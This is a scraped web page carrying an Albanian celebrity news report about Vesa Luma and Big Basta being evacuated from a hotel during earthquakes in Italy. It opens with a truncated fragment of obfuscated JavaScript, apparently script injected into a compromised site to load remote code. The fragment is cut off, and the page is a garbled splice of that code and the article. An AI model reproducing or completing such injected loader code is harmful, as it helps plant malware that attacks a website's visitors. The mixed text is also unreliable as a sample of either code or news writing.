;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Orët e frikshme për Vesën e Big Bastën në Itali (FOTO)

By

Pas një periudhe disa mujore të distancimit shkaku i ardhjes në jetë të djalit Lian, kjo fundjavë për Vesa Lumën dhe Big Bastën shënoi rikthimin me koncerte kudo ku ka shqiptarë.

Ditën e djeshme, çifti i njohur mori rrugën drejt Italisë ku edhe shijuan çdo moment në kryeqendrën, Romën por zhvillimet e ditëve të sotme kanë bërë që këtë rikthim me punë, ata ta mbajnë mend definitivisht gjatë.

Lëkundjet e forta seizmike të mëngjesit që në regjistër hyjnë si më seriozet në dekada për Itali janë përjetuar nga Vesa dhe Big Basta me gjithë dridhjet më të vogla që kanë pasuar.

Çifti duket të mos jenë shqetësuar fillimisht aq shumë por tërmetet e vazhdueshme kanë ndikuar që me vendim të stafit, ata të evakuohen nga hoteli shkaku i rrezikut të ripërsëritjes së dridhjeve.

Eksperiencën, Vesa që fatmirësisht ka shpëtuar pa ndonjë lëndim, në epokën e telefonit e ka ndarë me ndjekësit në rrjetin social Snapchat. /Prive.al/

Artikuj të ngjashëm